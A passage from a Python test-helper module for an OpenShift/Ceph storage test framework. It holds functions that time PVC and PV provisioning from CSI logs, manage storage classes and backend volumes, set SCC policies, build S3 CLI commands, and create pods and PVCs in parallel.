Args:
interface (str): The interface backed the PVC
pvc_name (str / list): Name of the PVC(s) for creation time
the list will be list of pvc objects
status (str): the status that we want to get - Start / End
Returns:
datetime object: Time of PVC(s) creation
"""
# Define the log operation to search for based on the requested status
operation = "started"
if status.lower() == "end":
operation = "succeeded"
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the time for the one PVC provisioning
if isinstance(pvc_name, str):
stat = [i for i in logs if re.search(f"provision.*{pvc_name}.*{operation}", i)]
mon_day = " ".join(stat[0].split(" ")[0:2])
stat = f"{this_year} {mon_day}"
# Extract the time for the list of PVCs provisioning
if isinstance(pvc_name, list):
all_stats = []
for i in range(0, len(pvc_name)):
name = pvc_name[i].name
stat = [i for i in logs if re.search(f"provision.*{name}.*{operation}", i)]
mon_day = " ".join(stat[0].split(" ")[0:2])
stat = f"{this_year} {mon_day}"
all_stats.append(stat)
all_stats = sorted(all_stats)
if status.lower() == "end":
stat = all_stats[-1] # return the highest time
elif status.lower() == "start":
stat = all_stats[0] # return the lowest time
return datetime.datetime.strptime(stat, DATE_TIME_FORMAT)
def get_start_creation_time(interface, pvc_name):
"""
Get the starting creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
datetime object: Start time of PVC creation
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the starting time for the PVC provisioning
start = [i for i in logs if re.search(f"provision.*{pvc_name}.*started", i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start = f"{this_year} {mon_day}"
return datetime.datetime.strptime(start, DATE_TIME_FORMAT)
def get_end_creation_time(interface, pvc_name):
"""
Get the ending creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
datetime object: End time of PVC creation
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the end time for the PVC provisioning
end = [i for i in logs if re.search(f"provision.*{pvc_name}.*succeeded", i)]
# End provisioning string may appear in logs several times, take here the latest one
mon_day = " ".join(end[-1].split(" ")[0:2])
end = f"{this_year} {mon_day}"
return datetime.datetime.strptime(end, DATE_TIME_FORMAT)
def measure_pvc_creation_time(interface, pvc_name):
"""
Measure PVC creation time based on logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
float: Creation time for the PVC
"""
start = get_start_creation_time(interface=interface, pvc_name=pvc_name)
end = get_end_creation_time(interface=interface, pvc_name=pvc_name)
total = end - start
return total.total_seconds()
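# Usage sketch (illustrative only): measuring how long a freshly created PVC
# took to provision, based on the csi-provisioner logs parsed above. The
# storage class name is a placeholder.
#
#   pvc_obj = create_pvc(sc_name="my-storageclass", size="5Gi")
#   wait_for_resource_state(pvc_obj, "Bound", timeout=120)
#   seconds = measure_pvc_creation_time(constants.CEPHBLOCKPOOL, pvc_obj.name)
#   logger.info(f"PVC {pvc_obj.name} creation took {seconds} seconds")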
def measure_pvc_creation_time_bulk(interface, pvc_name_list, wait_time=60):
"""
Measure PVC creation time of bulk PVC based on logs.
Args:
interface (str): The interface backed the PVC
pvc_name_list (list): List of PVC Names for measuring creation time
wait_time (int): Seconds to wait before collecting CSI log
Returns:
pvc_dict (dict): Dictionary of pvc_name with creation time.
"""
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# wait added due to some delay in CSI log generation
time.sleep(wait_time)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter = 0
while True:
no_data_list = list()
for name in pvc_name_list:
# check if PV data present in CSI logs
start = [i for i in logs if re.search(f"provision.*{name}.*started", i)]
end = [i for i in logs if re.search(f"provision.*{name}.*succeeded", i)]
if not start or not end:
no_data_list.append(name)
if no_data_list:
# Clear and get CSI logs after 60secs
logging.info(f"PVC count without CSI create log data {len(no_data_list)}")
logs.clear()
time.sleep(wait_time)
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter += 1
if loop_counter >= 6:
logging.info("Waited for more than 6mins still no data")
raise UnexpectedBehaviour(
f"There is no pvc creation data in CSI logs for {no_data_list}"
)
continue
else:
break
pvc_dict = dict()
this_year = str(datetime.datetime.now().year)
for pvc_name in pvc_name_list:
# Extract the starting time for the PVC provisioning
start = [i for i in logs if re.search(f"provision.*{pvc_name}.*started", i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start = f"{this_year} {mon_day}"
start_time = datetime.datetime.strptime(start, DATE_TIME_FORMAT)
# Extract the end time for the PVC provisioning
end = [i for i in logs if re.search(f"provision.*{pvc_name}.*succeeded", i)]
mon_day = " ".join(end[0].split(" ")[0:2])
end = f"{this_year} {mon_day}"
end_time = datetime.datetime.strptime(end, DATE_TIME_FORMAT)
total = end_time - start_time
pvc_dict[pvc_name] = total.total_seconds()
return pvc_dict
def measure_pv_deletion_time_bulk(
interface, pv_name_list, wait_time=60, return_log_times=False
):
"""
Measure PV deletion time of bulk PV, based on logs.
Args:
interface (str): The interface backed the PV
pv_name_list (list): List of PV Names for measuring deletion time
wait_time (int): Seconds to wait before collecting CSI log
return_log_times (bool): Determines the return value -- if False, dictionary of pv_names with the deletion time
is returned; if True -- the dictionary of pv_names with the tuple of (start_deletion_time,
end_deletion_time) is returned
Returns:
pv_dict (dict): Dictionary where the pv_names are the keys. The value of the dictionary depend on the
return_log_times argument value and are either the corresponding deletion times (when return_log_times
is False) or a tuple of (start_deletion_time, end_deletion_time) as they appear in the logs
"""
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# wait added due to some delay in CSI log generation
time.sleep(wait_time)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter = 0
while True:
no_data_list = list()
for pv in pv_name_list:
# check if PV data present in CSI logs
start = [i for i in logs if re.search(f'delete "{pv}": started', i)]
end = [i for i in logs if re.search(f'delete "{pv}": succeeded', i)]
if not start or not end:
no_data_list.append(pv)
if no_data_list:
# Clear and get CSI logs after 60secs
logging.info(f"PV count without CSI delete log data {len(no_data_list)}")
logs.clear()
time.sleep(wait_time)
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter += 1
if loop_counter >= 6:
logging.info("Waited for more than 6mins still no data")
raise UnexpectedBehaviour(
f"There is no pv deletion data in CSI logs for {no_data_list}"
)
continue
else:
break
pv_dict = dict()
this_year = str(datetime.datetime.now().year)
for pv_name in pv_name_list:
# Extract the deletion start time for the PV
start = [i for i in logs if re.search(f'delete "{pv_name}": started', i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start_tm = f"{this_year} {mon_day}"
start_time = datetime.datetime.strptime(start_tm, DATE_TIME_FORMAT)
# Extract the deletion end time for the PV
end = [i for i in logs if re.search(f'delete "{pv_name}": succeeded', i)]
mon_day = " ".join(end[0].split(" ")[0:2])
end_tm = f"{this_year} {mon_day}"
end_time = datetime.datetime.strptime(end_tm, DATE_TIME_FORMAT)
total = end_time - start_time
if not return_log_times:
pv_dict[pv_name] = total.total_seconds()
else:
pv_dict[pv_name] = (start_tm, end_tm)
return pv_dict
def get_start_deletion_time(interface, pv_name):
"""
Get the starting deletion time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pv_name (str): Name of the PV for deletion time measurement
Returns:
datetime object: Start time of PVC deletion
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the starting time for the PVC deletion
start = [i for i in logs if re.search(f'delete "{pv_name}": started', i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start = f"{this_year} {mon_day}"
return datetime.datetime.strptime(start, DATE_TIME_FORMAT)
def get_end_deletion_time(interface, pv_name):
"""
Get the ending deletion time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pv_name (str): Name of the PV for deletion time measurement
Returns:
datetime object: End time of PVC deletion
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the end time for the PV deletion
end = [i for i in logs if re.search(f'delete "{pv_name}": succeeded', i)]
mon_day = " ".join(end[0].split(" ")[0:2])
end = f"{this_year} {mon_day}"
return datetime.datetime.strptime(end, DATE_TIME_FORMAT)
def measure_pvc_deletion_time(interface, pv_name):
"""
Measure PVC deletion time based on logs
Args:
interface (str): The interface backed the PVC
pv_name (str): Name of the PV for deletion time measurement
Returns:
float: Deletion time for the PVC
"""
start = get_start_deletion_time(interface=interface, pv_name=pv_name)
end = get_end_deletion_time(interface=interface, pv_name=pv_name)
total = end - start
return total.total_seconds()
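# Usage sketch (illustrative only): capturing the backing PV name before
# deleting a PVC, then measuring the deletion time from the provisioner logs.
# pvc_obj is a placeholder PVC object and backed_pv is an assumption about its
# API.
#
#   pv_name = pvc_obj.backed_pv
#   pvc_obj.delete()
#   seconds = measure_pvc_deletion_time(constants.CEPHBLOCKPOOL, pv_name)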
def pod_start_time(pod_obj):
"""
Function to measure time taken for container(s) to get into running state
by measuring the difference between container's start time (when container
went into running state) and started time (when container was actually
started)
Args:
pod_obj(obj): pod object to measure start time
Returns:
containers_start_time(dict):
Returns the name and start time of container(s) in a pod
"""
time_format = "%Y-%m-%dT%H:%M:%SZ"
containers_start_time = {}
start_time = pod_obj.data["status"]["startTime"]
start_time = datetime.datetime.strptime(start_time, time_format)
for container in range(len(pod_obj.data["status"]["containerStatuses"])):
started_time = pod_obj.data["status"]["containerStatuses"][container]["state"][
"running"
]["startedAt"]
started_time = datetime.datetime.strptime(started_time, time_format)
container_name = pod_obj.data["status"]["containerStatuses"][container]["name"]
container_start_time = (started_time - start_time).seconds
containers_start_time[container_name] = container_start_time
return containers_start_time
def get_default_storage_class():
"""
Get the default StorageClass(es)
Returns:
list: default StorageClass(es) list
"""
default_sc_obj = ocp.OCP(kind="StorageClass")
storage_classes = default_sc_obj.get().get("items")
storage_classes = [
sc for sc in storage_classes if "annotations" in sc.get("metadata")
]
return [
sc.get("metadata").get("name")
for sc in storage_classes
if sc.get("metadata")
.get("annotations")
.get("storageclass.kubernetes.io/is-default-class")
== "true"
]
def change_default_storageclass(scname):
"""
Change the default StorageClass to the given SC name
Args:
scname (str): StorageClass name
Returns:
bool: True on success
"""
default_sc = get_default_storage_class()
ocp_obj = ocp.OCP(kind="StorageClass")
if default_sc:
# Change the existing default Storageclass annotation to false
for sc in default_sc:
patch = (
' \'{"metadata": {"annotations":'
'{"storageclass.kubernetes.io/is-default-class"'
':"false"}}}\' '
)
patch_cmd = f"patch storageclass {sc} -p" + patch
ocp_obj.exec_oc_cmd(command=patch_cmd)
# Change the new storageclass to default
patch = (
' \'{"metadata": {"annotations":'
'{"storageclass.kubernetes.io/is-default-class"'
':"true"}}}\' '
)
patch_cmd = f"patch storageclass {scname} -p" + patch
ocp_obj.exec_oc_cmd(command=patch_cmd)
return True
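# Usage sketch (illustrative only): switching the cluster default storage class
# and confirming the change with get_default_storage_class() above.
#
#   change_default_storageclass(constants.DEFAULT_STORAGECLASS_RBD)
#   assert constants.DEFAULT_STORAGECLASS_RBD in get_default_storage_class()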
def is_volume_present_in_backend(interface, image_uuid, pool_name=None):
"""
Check whether Image/Subvolume is present in the backend.
Args:
interface (str): The interface backed the PVC
image_uuid (str): Part of VolID which represents corresponding
image/subvolume in backend, eg:
``oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'``
Output is the CSI generated VolID and looks like:
``0001-000c-rook-cluster-0000000000000001-f301898c-a192-11e9-852a-1eeeb6975c91``
where image_uuid is ``f301898c-a192-11e9-852a-1eeeb6975c91``
pool_name (str): Name of the rbd-pool if interface is CephBlockPool
Returns:
bool: True if volume is present and False if volume is not present
"""
cmd = ""
valid_error = []
ct_pod = pod.get_ceph_tools_pod()
if interface == constants.CEPHBLOCKPOOL:
valid_error = [f"error opening image csi-vol-{image_uuid}"]
cmd = f"rbd info -p {pool_name} csi-vol-{image_uuid}"
if interface == constants.CEPHFILESYSTEM:
valid_error = [
f"Subvolume 'csi-vol-{image_uuid}' not found",
f"subvolume 'csi-vol-{image_uuid}' does not exist",
]
cmd = (
f"ceph fs subvolume getpath {get_cephfs_name()}"
f" csi-vol-{image_uuid} csi"
)
try:
ct_pod.exec_ceph_cmd(ceph_cmd=cmd, format="json")
logger.info(
f"Verified: Volume corresponding to uuid {image_uuid} exists " f"in backend"
)
return True
except CommandFailed as ecf:
assert any([error in str(ecf) for error in valid_error]), (
f"Error occurred while verifying volume is present in backend: "
f"{str(ecf)} ImageUUID: {image_uuid}. Interface type: {interface}"
)
logger.info(
f"Volume corresponding to uuid {image_uuid} does not exist " f"in backend"
)
return False
def verify_volume_deleted_in_backend(
interface, image_uuid, pool_name=None, timeout=180
):
"""
Ensure that Image/Subvolume is deleted in the backend.
Args:
interface (str): The interface backed the PVC
image_uuid (str): Part of VolID which represents corresponding
image/subvolume in backend, eg:
``oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'``
Output is the CSI generated VolID and looks like:
``0001-000c-rook-cluster-0000000000000001-f301898c-a192-11e9-852a-1eeeb6975c91``
where image_uuid is ``f301898c-a192-11e9-852a-1eeeb6975c91``
pool_name (str): Name of the rbd-pool if interface is CephBlockPool
timeout (int): Wait time for the volume to be deleted.
Returns:
bool: True if volume is deleted before timeout.
False if volume is not deleted.
"""
try:
for ret in TimeoutSampler(
timeout,
2,
is_volume_present_in_backend,
interface=interface,
image_uuid=image_uuid,
pool_name=pool_name,
):
if not ret:
break
logger.info(
f"Verified: Volume corresponding to uuid {image_uuid} is deleted "
f"in backend"
)
return True
except TimeoutExpiredError:
logger.error(
f"Volume corresponding to uuid {image_uuid} is not deleted " f"in backend"
)
# Log 'ceph progress' and 'ceph rbd task list' for debugging purpose
ct_pod = pod.get_ceph_tools_pod()
ct_pod.exec_ceph_cmd("ceph progress json", format=None)
ct_pod.exec_ceph_cmd("ceph rbd task list")
return False
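# Usage sketch (illustrative only): deriving the image UUID from a PV's CSI
# volume handle (format shown in the docstrings above; the UUID is the last
# five dash-separated segments) and checking the backend. pv_obj is a
# placeholder PV object.
#
#   vol_handle = pv_obj.get()["spec"]["csi"]["volumeHandle"]
#   image_uuid = "-".join(vol_handle.split("-")[-5:])
#   verify_volume_deleted_in_backend(
#       constants.CEPHBLOCKPOOL, image_uuid, pool_name=default_ceph_block_pool()
#   )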
def delete_volume_in_backend(img_uuid, pool_name=None):
"""
Delete an Image/Subvolume in the backend
Args:
img_uuid (str): Part of VolID which represents corresponding
image/subvolume in backend, eg:
``oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'``
Output is the CSI generated VolID and looks like:
``0001-000c-rook-cluster-0000000000000001-f301898c-a192-11e9-852a-1eeeb6975c91``
where image_uuid is ``f301898c-a192-11e9-852a-1eeeb6975c91``
pool_name (str): The name of the pool
Returns:
bool: True if image deleted successfully
False if:
Pool not found
image not found
image not deleted
"""
cmd = ""
valid_error = []
pool_cr = get_pool_cr(pool_name)
if pool_cr is not None:
if pool_cr["kind"] == "CephFilesystem":
interface = "CephFileSystem"
else:
interface = pool_cr["kind"]
logger.info(f"pool {pool_cr} kind is {interface}")
else:
logger.info(
f"Pool {pool_name} has no kind of "
f"{constants.CEPHBLOCKPOOL} "
f"or {constants.CEPHFILESYSTEM}"
)
return False
# Checking if image is present before trying to delete
image_present_results = is_volume_present_in_backend(
interface=interface, image_uuid=img_uuid, pool_name=pool_name
)
# In case the image is present, delete it
if image_present_results:
if interface == constants.CEPHBLOCKPOOL:
logger.info(
f"Trying to delete image csi-vol-{img_uuid} from pool {pool_name}"
)
valid_error = ["No such file or directory"]
cmd = f"rbd rm -p {pool_name} csi-vol-{img_uuid}"
if interface == constants.CEPHFILESYSTEM:
logger.info(
f"Trying to delete image csi-vol-{img_uuid} from pool {pool_name}"
)
valid_error = [
f"Subvolume 'csi-vol-{img_uuid}' not found",
f"subvolume 'csi-vol-{img_uuid}' does not exist",
]
cmd = f"ceph fs subvolume rm {get_cephfs_name()} csi-vol-{img_uuid} csi"
ct_pod = pod.get_ceph_tools_pod()
try:
ct_pod.exec_ceph_cmd(ceph_cmd=cmd, format=None)
except CommandFailed as ecf:
if any([error in str(ecf) for error in valid_error]):
logger.info(
f"Error occurred while verifying volume is present in backend: "
f"{str(ecf)} ImageUUID: {img_uuid}. Interface type: {interface}"
)
return False
verify_img_delete_result = is_volume_present_in_backend(
interface=interface, image_uuid=img_uuid, pool_name=pool_name
)
if not verify_img_delete_result:
logger.info(f"Image csi-vol-{img_uuid} deleted successfully")
return True
else:
logger.info(f"Image csi-vol-{img_uuid} not deleted successfully")
return False
return False
def create_serviceaccount(namespace):
"""
Create a Serviceaccount
Args:
namespace (str): The namespace for the serviceaccount creation
Returns:
OCS: An OCS instance for the service_account
"""
service_account_data = templating.load_yaml(constants.SERVICE_ACCOUNT_YAML)
service_account_data["metadata"]["name"] = create_unique_resource_name(
"sa", "serviceaccount"
)
service_account_data["metadata"]["namespace"] = namespace
return create_resource(**service_account_data)
def get_serviceaccount_obj(sa_name, namespace):
"""
Get serviceaccount obj
Args:
sa_name (str): Service Account name
namespace (str): The namespace for the serviceaccount creation
Returns:
OCS: An OCS instance for the service_account
"""
ocp_sa_obj = ocp.OCP(kind=constants.SERVICE_ACCOUNT, namespace=namespace)
try:
sa_dict = ocp_sa_obj.get(resource_name=sa_name)
return OCS(**sa_dict)
except CommandFailed:
logger.error("ServiceAccount not found in specified namespace")
def validate_scc_policy(sa_name, namespace, scc_name=constants.PRIVILEGED):
"""
Validate serviceaccount is added to scc of privileged
Args:
sa_name (str): Service Account name
namespace (str): The namespace for the serviceaccount creation
scc_name (str): SCC name
Returns:
bool: True if sc_name is present in scc of privileged else False
"""
sa_name = f"system:serviceaccount:{namespace}:{sa_name}"
logger.info(sa_name)
ocp_scc_obj = ocp.OCP(kind=constants.SCC, namespace=namespace)
scc_dict = ocp_scc_obj.get(resource_name=scc_name)
scc_users_list = scc_dict.get("users")
for scc_user in scc_users_list:
if scc_user == sa_name:
return True
return False
def add_scc_policy(sa_name, namespace):
"""
Adding ServiceAccount to scc privileged
Args:
sa_name (str): ServiceAccount name
namespace (str): The namespace for the scc_policy creation
"""
ocp = OCP()
out = ocp.exec_oc_cmd(
command=f"adm policy add-scc-to-user privileged system:serviceaccount:{namespace}:{sa_name}",
out_yaml_format=False,
)
logger.info(out)
def remove_scc_policy(sa_name, namespace):
"""
Removing ServiceAccount from scc privileged
Args:
sa_name (str): ServiceAccount name
namespace (str): The namespace for the scc_policy deletion
"""
ocp = OCP()
out = ocp.exec_oc_cmd(
command=f"adm policy remove-scc-from-user privileged system:serviceaccount:{namespace}:{sa_name}",
out_yaml_format=False,
)
logger.info(out)
def craft_s3_command(cmd, mcg_obj=None, api=False):
"""
Crafts the AWS CLI S3 command including the
login credentials and command to be ran
Args:
mcg_obj: An MCG object containing the MCG S3 connection credentials
cmd: The AWSCLI command to run
api: True if the call is for s3api, false if s3
Returns:
str: The crafted command, ready to be executed on the pod
"""
api = "api" if api else ""
if mcg_obj:
base_command = (
f'sh -c "AWS_CA_BUNDLE={constants.SERVICE_CA_CRT_AWSCLI_PATH} '
f"AWS_ACCESS_KEY_ID={mcg_obj.access_key_id} "
f"AWS_SECRET_ACCESS_KEY={mcg_obj.access_key} "
f"AWS_DEFAULT_REGION={mcg_obj.region} "
f"aws s3{api} "
f"--endpoint={mcg_obj.s3_internal_endpoint} "
)
string_wrapper = '"'
else:
base_command = f"aws s3{api} --no-sign-request "
string_wrapper = ""
return f"{base_command}{cmd}{string_wrapper}"
def get_current_test_name():
"""
A function to return the current test name in a parsed manner
Returns:
str: The test name.
"""
return os.environ.get("PYTEST_CURRENT_TEST").split(":")[-1].split(" ")[0]
def setup_pod_directories(pod_obj, dir_names):
"""
Creates directories on the specified pod.
Directories created under the respective test name directory.
Args:
pod_obj: A pod object on which to create directories
dir_names: A list of directory names to create.
Returns:
list: A list of all the full paths of the created directories
"""
full_dirs_path = []
test_name = get_current_test_name()
pod_obj.exec_cmd_on_pod(command=f"mkdir -p {test_name}")
for cur_dir in dir_names:
current = f"{test_name}/{cur_dir}"
pod_obj.exec_cmd_on_pod(command=f"mkdir -p {current}")
full_dirs_path.append(current)
return full_dirs_path
def wait_for_resource_count_change(
func_to_use,
previous_num,
namespace,
change_type="increase",
min_difference=1,
timeout=20,
interval=2,
**func_kwargs,
):
"""
Wait for a change in total count of PVC or pod
Args:
func_to_use (function): Function to be used to fetch resource info
Supported functions: pod.get_all_pvcs(), pod.get_all_pods()
previous_num (int): Previous number of pods/PVCs for comparison
namespace (str): Name of the namespace
change_type (str): Type of change to check. Accepted values are
'increase' and 'decrease'. Default is 'increase'.
min_difference (int): Minimum required difference in PVC/pod count
timeout (int): Maximum wait time in seconds
interval (int): Time in seconds to wait between consecutive checks
Returns:
True if difference in count is greater than or equal to
'min_difference'. False in case of timeout.
"""
try:
for sample in TimeoutSampler(
timeout, interval, func_to_use, namespace, **func_kwargs
):
if func_to_use == pod.get_all_pods:
current_num = len(sample)
else:
current_num = len(sample["items"])
if change_type == "increase":
count_diff = current_num - previous_num
else:
count_diff = previous_num - current_num
if count_diff >= min_difference:
return True
except TimeoutExpiredError:
return False
def verify_pv_mounted_on_node(node_pv_dict):
"""
Check if mount point of a PV exists on a node
Args:
node_pv_dict (dict): Node to PV list mapping
eg: {'node1': ['pv1', 'pv2', 'pv3'], 'node2': ['pv4', 'pv5']}
Returns:
dict: Node to existing PV list mapping
eg: {'node1': ['pv1', 'pv3'], 'node2': ['pv5']}
"""
existing_pvs = {}
for node_name, pvs in node_pv_dict.items():
cmd = f"oc debug nodes/{node_name} -- df"
df_on_node = run_cmd(cmd)
existing_pvs[node_name] = []
for pv_name in pvs:
if f"/pv/{pv_name}/" in df_on_node:
existing_pvs[node_name].append(pv_name)
return existing_pvs
def converge_lists(list_to_converge):
"""
Function to flatten and remove the sublist created during future obj
Args:
list_to_converge (list): arg list of lists, eg: [[1,2],[3,4]]
Returns:
list (list): return converged list eg: [1,2,3,4]
"""
return [item for sublist in list_to_converge for item in sublist]
def create_multiple_pvc_parallel(sc_obj, namespace, number_of_pvc, size, access_modes):
"""
    Function to create multiple PVCs in parallel using threads.
    The function will create PVCs based on the given access modes.
    Args:
        sc_obj (OCS): Storage Class object
        namespace (str): The namespace for creating the PVCs
        number_of_pvc (int): Number of PVCs to be created per access mode
size (str): size of the pvc eg: '10Gi'
access_modes (list): List of access modes for PVC creation
Returns:
pvc_objs_list (list): List of pvc objs created in function
"""
obj_status_list, result_lists = ([] for i in range(2))
with ThreadPoolExecutor() as executor:
for mode in access_modes:
result_lists.append(
executor.submit(
create_multiple_pvcs,
sc_name=sc_obj.name,
namespace=namespace,
number_of_pvc=number_of_pvc,
access_mode=mode,
size=size,
)
)
result_list = [result.result() for result in result_lists]
pvc_objs_list = converge_lists(result_list)
# Check for all the pvcs in Bound state
with ThreadPoolExecutor() as executor:
for objs in pvc_objs_list:
obj_status_list.append(
executor.submit(wait_for_resource_state, objs, "Bound", 90)
)
if False in [obj.result() for obj in obj_status_list]:
raise TimeoutExpiredError
return pvc_objs_list
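# Illustrative usage sketch (names are assumptions): create five RWO and five RWX
# PVCs in parallel from an existing StorageClass object and wait for Bound state.
# The access mode strings are the standard Kubernetes values.
def _example_create_pvcs_parallel(sc_obj):
    return create_multiple_pvc_parallel(
        sc_obj=sc_obj,
        namespace="example-namespace",
        number_of_pvc=5,
        size="10Gi",
        access_modes=["ReadWriteOnce", "ReadWriteMany"],
    )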
def create_pods_parallel(
pvc_list,
namespace,
interface,
pod_dict_path=None,
sa_name=None,
raw_block_pv=False,
dc_deployment=False,
node_selector=None,
):
"""
Function to create pods in parallel
Args:
pvc_list (list): List of pvcs to be attached in pods
namespace (str): The namespace for creating pod
interface (str): The interface backed the PVC
pod_dict_path (str): pod_dict_path for yaml
sa_name (str): sa_name for providing permission
        raw_block_pv (bool): True to use a raw block PV, False otherwise
        dc_deployment (bool): True for a DeploymentConfig deployment, False otherwise
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
Returns:
pod_objs (list): Returns list of pods created
"""
future_pod_objs = []
    # Use a 300 sec wait time since in scale tests, once the setup has more
    # pods, the time taken for a pod to come up depends on the available resources
wait_time = 300
if raw_block_pv and not pod_dict_path:
pod_dict_path = constants.CSI_RBD_RAW_BLOCK_POD_YAML
with ThreadPoolExecutor() as executor:
for pvc_obj in pvc_list:
future_pod_objs.append(
executor.submit(
create_pod,
interface_type=interface,
pvc_name=pvc_obj.name,
do_reload=False,
namespace=namespace,
raw_block_pv=raw_block_pv,
pod_dict_path=pod_dict_path,
sa_name=sa_name,
dc_deployment=dc_deployment,
node_selector=node_selector,
)
)
pod_objs = [pvc_obj.result() for pvc_obj in future_pod_objs]
    # Check that all the pods are in Running state
    # The pod creation above does not wait for the pods to be created due to thread usage
with ThreadPoolExecutor() as executor:
for obj in pod_objs:
future_pod_objs.append(
executor.submit(
wait_for_resource_state, obj, "Running", timeout=wait_time
)
)
# If pods not up raise exception/failure
if False in [obj.result() for obj in future_pod_objs]:
raise TimeoutExpiredError
return pod_objs
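# Illustrative usage sketch (assumption): attach each previously created PVC to
# its own CephFS-backed pod and wait for the pods to reach Running state.
def _example_create_pods_for_pvcs(pvc_objs):
    return create_pods_parallel(
        pvc_list=pvc_objs,
        namespace="example-namespace",
        interface=constants.CEPHFILESYSTEM,
    )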
def delete_objs_parallel(obj_list):
"""
Function to delete objs specified in list
Args:
        obj_list (list): List of objects (pod, PVC, etc.) to delete
    Returns:
        bool: True once all delete threads have completed
"""
threads = list()
for obj in obj_list:
process = threading.Thread(target=obj.delete)
process.start()
threads.append(process)
for process in threads:
process.join()
return True
def memory_leak_analysis(median_dict):
"""
    Function to analyse memory leak after execution of a test case. The memory
    leak is analyzed based on the top output "RES" value of the ceph-osd daemon,
    i.e. ``list[7]`` in the code.
    More detail on the median value: calculating the memory leak requires a
    constant baseline, which should not be the start or end of the test, so it is
    calculated by collecting memory usage for 180 sec before TC execution and
    taking the median of it. The memory value can differ per node, so a constant
    value is identified for each node and stored in median_dict.
Args:
median_dict (dict): dict of worker nodes and respective median value
eg: median_dict = {'worker_node_1':102400, 'worker_node_2':204800, ...}
Usage::
test_case(.., memory_leak_function):
.....
median_dict = helpers.get_memory_leak_median_value()
.....
TC execution part, memory_leak_fun will capture data
....
helpers.memory_leak_analysis(median_dict)
....
"""
# dict to store memory leak difference for each worker
diff = {}
for worker in node.get_worker_nodes():
memory_leak_data = []
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
with open(f"/tmp/{worker}-top-output.txt", "r") as f:
data = f.readline()
list = data.split(" ")
list = [i for i in list if i]
memory_leak_data.append(list[7])
else:
logging.info(f"worker {worker} memory leak file not found")
raise UnexpectedBehaviour
number_of_lines = len(memory_leak_data) - 1
        # Get the start value from the median_dict arg for the respective worker
start_value = median_dict[f"{worker}"]
end_value = memory_leak_data[number_of_lines]
logging.info(f"Median value {start_value}")
logging.info(f"End value {end_value}")
# Convert the values to kb for calculations
if start_value.__contains__("g"):
start_value = float(1024 ** 2 * float(start_value[:-1]))
elif start_value.__contains__("m"):
start_value = float(1024 * float(start_value[:-1]))
else:
start_value = float(start_value)
if end_value.__contains__("g"):
end_value = float(1024 ** 2 * float(end_value[:-1]))
elif end_value.__contains__("m"):
end_value = float(1024 * float(end_value[:-1]))
else:
end_value = float(end_value)
# Calculate the percentage of diff between start and end value
# Based on value decide TC pass or fail
diff[worker] = ((end_value - start_value) / start_value) * 100
logging.info(f"Percentage diff in start and end value {diff[worker]}")
if diff[worker] <= 20:
logging.info(f"No memory leak in worker {worker} passing the test")
else:
logging.info(f"There is a memory leak in worker {worker}")
logging.info(f"Memory median value start of the test {start_value}")
logging.info(f"Memory value end of the test {end_value}")
raise UnexpectedBehaviour
def get_memory_leak_median_value():
"""
    Function to calculate the memory leak median value by collecting data for 180 sec
    and finding the median value, which will be considered as the starting point
    to evaluate the memory leak using the "RES" value of the ceph-osd daemon,
    i.e. ``list[7]`` in the code.
Returns:
median_dict (dict): dict of worker nodes and respective median value
"""
median_dict = {}
timeout = 180 # wait for 180 sec to evaluate memory leak median data.
